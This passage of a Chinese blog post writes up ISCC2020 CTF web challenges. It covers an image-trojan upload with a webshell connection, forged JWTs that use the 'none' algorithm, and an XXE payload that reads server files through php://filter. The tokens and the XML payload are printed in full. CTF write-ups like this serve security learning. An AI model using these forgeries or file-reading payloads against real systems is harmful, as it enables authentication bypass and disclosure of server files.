?&gt;</code></pre><p>运行这段PHP代码，即可得到flag。<br><img src="http://img-blog.csdnimg.cn/2020052123153746.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述></p><h3 id=Web12：What-can-images-do><a href=#Web12：What-can-images-do class=headerlink title="Web12：What can images do"></a>Web12：What can images do</h3><p><strong>题目难度：简单</strong><br><strong>考察：文件上传+图片马</strong><br>当时做的时候没一点问题。总结的时候，发现又被某个”大佬”改了<br>上传文件目录的权限被改了，无法上传文件。<br>不过还好做的时候截图了。(最后比赛快结束时，题目又被修复了)<br>首先上传一个图片马<br><img src="http://img-blog.csdnimg.cn/20200511164849900.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述><br>然后抓包，使用这个功能包含上传的图片马<br><img src="http://img-blog.csdnimg.cn/20200511165004869.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述><br>然后使用蚁剑连接，找到flag文件打开即可<br><img src="http://img-blog.csdnimg.cn/20200511165317813.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述><br><img src="http://img-blog.csdnimg.cn/20200511165347779.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述></p><h3 id=Web13：未知的风险-1><a href=#Web13：未知的风险-1 class=headerlink title=Web13：未知的风险-1></a>Web13：未知的风险-1</h3><p><strong>题目难度：较难</strong><br><strong>考察：JWT绕过(破解key或设置加密为空)+xxe</strong><br>参考：<a href="https://www.cnblogs.com/hetianlab/p/12753770.html?tdsourcetag=s_pctim_aiomsg" target=_blank rel=noopener>从hfctf学习JWT伪造</a><br>总结时，发现题目依旧被大佬们搞崩了(然后又被修复好了)。这里就放上之前做的时候的截图吧。<br>设置加密为空，然后将原来的token使用<a href="http://jwt.io/" target=_blank rel=noopener>jwt工具</a>构造payload<br><img src="http://img-blog.csdnimg.cn/20200511190922167.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述></p><pre><code class=php>eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0 .eyJpZCI6InVzZXIiLCJpYXQiOjE1ODgzMDk5MDEsImp0aSI6ImVjZWNlM2YyOTFmZmRiZDVjMmMxOTVkZmU2OGMyNGRiIn0.</code></pre><p>设置为token访问,发现username和password，设置username和password再次生成payload<br><img src="http://img-blog.csdnimg.cn/20200511191402607.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述></p><pre><code class=php>eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJpZCI6InVzZXIiLCJpYXQiOjE1ODgzMDk5MDEsInVzZXJuYW1lIjoiYWRtaW4iLCJwYXNzd29yZCI6ImFkbWluMTIzIiwianRpIjoiZWNlY2UzZjI5MWZmZGJkNWMyYzE5NWRmZTY4YzI0ZGIifQ.</code></pre><p>访问，然后抓包，发现xml内容，并且和xxe的xxe-lab靶场很像。于是猜测使用xxe读取flag文件。<br>首先，先读取<code>/etc/passwd</code>测试一下，发现果然存在xxe漏洞。然后先读取<code>doLogin.php</code>Base64解码发现flag文件路径</p><pre><code class=xml>&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot; ?&gt;
&lt;!DOCTYPE hack [
&lt;!ENTITY file SYSTEM  &quot;php://filter/read=convert.base64-encode/resource=doLogin.php&quot;&gt;
]&gt;
&lt;user&gt;
  &lt;username&gt;&amp;file;&lt;/username&gt;
  &lt;password&gt;hack&lt;/password&gt;
&lt;/user&gt;</code></pre><p><img src="http://img-blog.csdnimg.cn/2020051119190588.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述><br>然后读取<code>flag.php</code>文件，再Base64解码得到flag<br><img src="http://img-blog.csdnimg.cn/20200511192035277.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述></p><h3 id=后记><a href=#后记 class=headerlink title=后记></a>后记</h3><p>Web题整体难度并不太难。这些Web题我学到的新知识有：<br><code>过滤括号()的SQL盲注</code>、<code>计算题脚本编写</code>、<code>过滤空格和#的SQL时间盲注</code>、<code>PHP可逆加密解密算法</code>、<code>JWT伪造</code></p><hr><span style="font-style: italic;color: gray;">转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 qwzf1024@qq.com</span></div></article><p><a class=dashang onclick=dashangToggle()>赏</a></p><div class=article_copyright><p><span class=copy-title>文章标题:</span>ISCC2020练武题Web总结</p><p><span class=copy-title>本文作者:</span><a title=qwzf>qwzf</a></p><p><span class=copy-title>发布时间:</span>2020-06-03, 15:18:55</p><p><span class=copy-title>最后更新:</span>2020-06-06, 00:55:53</p><span class=copy-title>原始链接:</span><a class=post-url href="/2020/06/03/ISCC2020练武题Web总结/" title=ISCC2020练武题Web总结>https://qwzf.github.io/2020/06/03/ISCC2020练武题Web总结/</a><p><span class=copy-title>版权声明:</span><i class="fa fa-creative-commons"></i> <a rel=license href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target=_blank>&#34;署名-非商用-相同方式共享 4.0&#34;</a> 转载请保留原文链接及作者。</p></div></div><div class=copyright><p class=footer-entry><span class=miit><img src=/img/gov.png title=中华人民共和国工业和信息化部> <a href="http://beian.miit.gov.cn/">豫ICP备20008873号</a></span> ©2019-2020 Qwzf</p><p class=footer-entry>Built with <a href="https://hexo.io/" target=_blank>Hexo</a> and <a href=https://github.com/yelog/hexo-theme-3-hexo target=_blank>3-hexo</a> theme</p></div><div class=full-toc><button class=full data-title="切换全屏 快捷键 s"><span class=min></span></button> <a id=rocket></a></div></div><div class=hide_box onclick=dashangToggle()></div><div class=shang_box><a class=shang_close onclick=dashangToggle()>×</a><div class=shang_tit><p>喜欢就点赞,疼爱就打赏</p></div><div class=shang_payimg><div class=pay_img><img src=/img/alipay.jpg class=alipay title=扫码支持> <img src=/img/weixin.jpg class=weixin title=扫码支持></div></div><div class=shang_payselect><span><label><input type=radio name=pay checked value=alipay>支付宝</label></span><span><label><input type=radio name=pay value=weixin>微信</label></span></div></div><script src=/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/haruto.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"log":false});</script></body><script src="/js/jquery.pjax.js?v=1.1.0"></script><script src="/js/script.js?v=1.1.0"></script><script>
    var img_resize = 'default';
    function initArticle() {
        /*渲染对应的表格样式*/
        
            $("#post .pjax table").addClass("green_title");
        

        /*渲染打赏样式*/
        
        $("input[name=pay]").on("click", function () {
            if($("input[name=pay]:checked").val()=="weixin"){
                $(".shang_box .shang_payimg .pay_img").addClass("weixin_img");
            } else {
                $(".shang_box .shang_payimg .pay_img").removeClass("weixin_img");
            }
        })
        

        /*高亮代码块行号*/
        

        /*访问数量*/
        
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js");
        

        /*代码高亮，行号对齐*/
        $('.pre-numbering').css('line-height',$('.has-numbering').css('line-height'));

        
        
    }

    /*打赏页面隐藏与展示*/
    
    function dashangToggle() {
        $(".shang_box").fadeToggle();
        $(".hide_box").fadeToggle();
    }
    

</script><style>
    
    
    .nav {
        width: 542px;
    }
    .nav.fullscreen {
        margin-left: -542px;
    }
    .nav-left {
        width: 120px;
    }
    
    
    @media screen and (max-width: 1468px) {
        .nav {
            width: 492px;
        }
        .nav.fullscreen {
            margin-left: -492px;
        }
        .nav-left {
            width: 100px;
        }
    }
    
    
    @media screen and (max-width: 1024px) {
        .nav {
            width: 492px;
            margin-left: -492px
        }
        .nav.fullscreen {
            margin-left: 0;
        }
    }
    
    @media screen and (max-width: 426px) {
        .nav {
            width: 100%;
        }
        .nav-left {
            width: 100%;
        }
    }
    
    
    .nav-right .title-list nav a .post-title, .nav-right .title-list #local-search-result a .post-title {
        color: #383636;
    }
    
    
    .nav-right .title-list nav a .post-date, .nav-right .title-list #local-search-result a .post-date {
        color: #5e5e5f;
    }
    
    
    .nav-right nav a.hover, #local-search-result a.hover{
        background-color: #e2e0e0;
    }
    
    

    /*列表样式*/
    

    /* 背景图样式 */
    
    


    /*引用块样式*/
    

    /*文章列表背景图*/
    

    
</style></html>